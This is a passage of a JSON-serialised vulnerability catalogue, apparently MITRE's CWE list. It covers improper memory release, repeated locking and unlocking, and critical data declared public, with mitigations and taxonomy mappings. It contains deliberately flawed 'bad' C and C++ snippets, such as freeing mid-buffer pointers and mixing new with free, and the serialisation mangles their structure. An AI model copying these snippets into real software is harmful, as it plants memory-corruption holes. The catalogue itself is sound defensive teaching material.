unexpected behavior.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...free(ptr);","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...delete ptr;","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}}],"Body_Text":"Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator."},{"attr":{"@_Demonstrative_Example_ID":"DX-85"},"Intro_Text":"In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A {};void A::foo(){}","xhtml:div":[{"#text":"void foo();","attr":{"@_style":"margin-left:10px;"}},{"#text":"int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-86"},"Intro_Text":"In this example, the program calls the delete[] function on non-heap memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A{};void A::foo(bool heap) {}","xhtml:div":[{"#text":"void foo(bool);","attr":{"@_style":"margin-left:10px;"}},{"#text":"int localArray[2] = {};int *p = localArray;if (heap){}delete[] p;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"11,22","attr":{"@_style":"margin-left:10px;"}},{"#text":"p = new int[2];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}],"xhtml:br":""}}}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"WIN30-C","Entry_Name":"Properly pair allocation and deallocation functions","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}},{"attr":{"@_External_Reference_ID":"REF-391"}}]},"Notes":{"Note":{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any programming language that allows manual management of memory."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided improvement to existing Mitigation"}}},"763":{"attr":{"@_ID":"763","@_Name":"Release of Invalid Pointer or Reference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application attempts to return a memory resource to the system, but calls the wrong release function or calls the appropriate release function incorrectly.","Extended_Description":{"xhtml:p":"This weakness can take several forms, such as:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The memory was allocated, explicitly or implicitly, via one memory management method and deallocated using a different, non-compatible function (CWE-762).","The function calls or memory management routines chosen are appropriate, however they are used incorrectly, such as in CWE-761."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"This weakness may result in the corruption of memory, and perhaps instructions, possibly leading to a crash. If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free()."},{"Phase":"Implementation","Description":"When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-78"},"Intro_Text":"This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \\\\0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&amp;inputstring, \\" \\\\t\\")) != NULL;)/.../free(ap[4]);","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (**ap != \'\\\\0\')","xhtml:div":{"#text":"if (++ap &gt;= &amp;argv[10])","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}}}},"Body_Text":"Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring."},{"attr":{"@_Demonstrative_Example_ID":"DX-80"},"Intro_Text":"This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...free(ptr);","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...delete ptr;","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}}],"Body_Text":"Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator."},{"attr":{"@_Demonstrative_Example_ID":"DX-77"},"Intro_Text":"In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded \\"Search Me!\\" string and a constant string length of 20.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int contains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( *str != NULL){}free(str);return FAILURE;","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( *str == c ){}str = str + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int cointains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( i &lt; strlen(str) ){}free(str);return FAILURE;","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( str[i] == c ){}i = i + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}}],"Body_Text":["However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it.","Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing."]},{"attr":{"@_Demonstrative_Example_ID":"DX-79"},"Intro_Text":"Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( isMalformed( tok ) ){}else{}tok = strtok( NULL, sep));","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free( tok );","xhtml:br":["",""],"xhtml:i":"/* ignore and discard bad data */"}},{"#text":"add_to_command_queue( tok );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}free( input )","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( !isMalformed( command ) ){}tok = strtok( NULL, sep));","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command );","xhtml:br":["","","",""],"xhtml:i":"/* copy and enqueue good data */"}},"xhtml:br":""}}}}],"Body_Text":["While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together.","One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed."]}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}}]},"Notes":{"Note":{"#text":"The view-1000 subtree that is associated with this weakness needs additional work. Several entries will likely be created in this branch. Currently the focus is on free() of memory, but delete and other related release routines may require the creation of intermediate entries that are not specific to a particular function. In addition, the role of other types of invalid pointers, such as an expired pointer, i.e. CWE-415 Double Free and release of uninitialized pointers, related to CWE-457.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"764":{"attr":{"@_ID":"764","@_Name":"Multiple Locks of a Critical Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software locks a critical resource more times than intended, leading to an unexpected state in the system.","Extended_Description":"When software is operating in a concurrent environment and repeatedly locks a critical resource, the consequences will vary based on the type of lock, the lock\'s implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra locking calls will reduce the size of the total available pool, possibly leading to degraded performance or a denial of service. If this can be triggered by an attacker, it will be similar to an unrestricted lock (CWE-412). In the context of a binary lock, it is likely that any duplicate locking attempts will never succeed since the lock is already held and progress may not be possible.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["DoS: Resource Consumption (CPU)","DoS: Crash, Exit, or Restart","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"Notes":{"Note":{"#text":"An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"765":{"attr":{"@_ID":"765","@_Name":"Multiple Unlocks of a Critical Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software unlocks a critical resource more times than intended, leading to an unexpected state in the system.","Extended_Description":"When software is operating in a concurrent environment and repeatedly unlocks a critical resource, the consequences will vary based on the type of lock, the lock\'s implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra calls to unlock will increase the count for the number of available resources, likely resulting in a crash or unpredictable behavior when the system nears capacity.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["DoS: Crash, Exit, or Restart","Modify Memory","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-0935","Description":"Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"Notes":{"Note":{"#text":"An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"766":{"attr":{"@_ID":"766","@_Name":"Critical Data Element Declared Public","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software declares a critical variable, field, or member to be public when intended security policy requires it to be private.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Application Data","Modify Application Data"],"Note":"Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value."},{"Scope":"Other","Impact":"Reduce Maintainability"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":"public: char* password;"},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":"private: char* password;"}],"Body_Text":["Instead, the critical data should be declared private.","Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257)."]},{"Intro_Text":"The following example shows a basic user account class that includes member variables for the username and password as well as a public constructor for the class and a public method to authorize access to the user account.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"#define MAX_PASSWORD_LENGTH 15#define MAX_USERNAME_LENGTH 15class UserAccount{};","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:int authorizeAccess(char *username, char *password){}char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UserAccount(char *username, char *password){}","xhtml:br":"","xhtml:div":{"#text":"if ((strlen(username) &gt; MAX_USERNAME_LENGTH) ||(strlen(password) &gt; MAX_PASSWORD_LENGTH)) {}strcpy(this-&gt;username, username);strcpy(this-&gt;password, password);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"ExitError(\\"Invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if ((strlen(username) &gt; MAX_USERNAME_LENGTH) ||(strlen(password) &gt; MAX_PASSWORD_LENGTH)) {}if (strcmp(this-&gt;username, username) ||strcmp(this-&gt;password, password))else","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"return 0;","attr":{"@_style":"margin-left:10px;"}},{"#text":"return 1;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":["// if the username and password in the input parameters are equal to","// the username and password of this account class then authorize access","// otherwise do not authorize access"]}}],"xhtml:br":["","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"class UserAccount{public:private:};","xhtml:br":["","","",""],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-3860","Description":"variables declared public allows remote read of system properties such as user name and home directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3860"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ01-J","Entry_Name":"Declare data members as private and provide accessible wrapper methods"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"},{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-15"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Critical Variable Declared Public","attr":{"@_Date":"2019-01-03"}}}},"767":{"attr":{"@_ID":"767","@_Name":"Access to Critical Private Variable via Public Method","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a public method that reads or modifies a private variable.","Extended_Description":"If an attacker modifies the variable to contain unexpected values, this could violate assumptions from other parts of the code. Additionally, if an attacker can read the private variable, it may expose sensitive information or make it easier to launch further attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use class accessor and mutator methods appropriately. Perform validation when accepting data from a public method that is intended to modify a critical private variable. Also be sure that appropriate access controls are being applied when a public method interfaces with critical data."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example declares a critical variable to be private, and then allows the variable to be modified by public methods.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"private: float price;public: 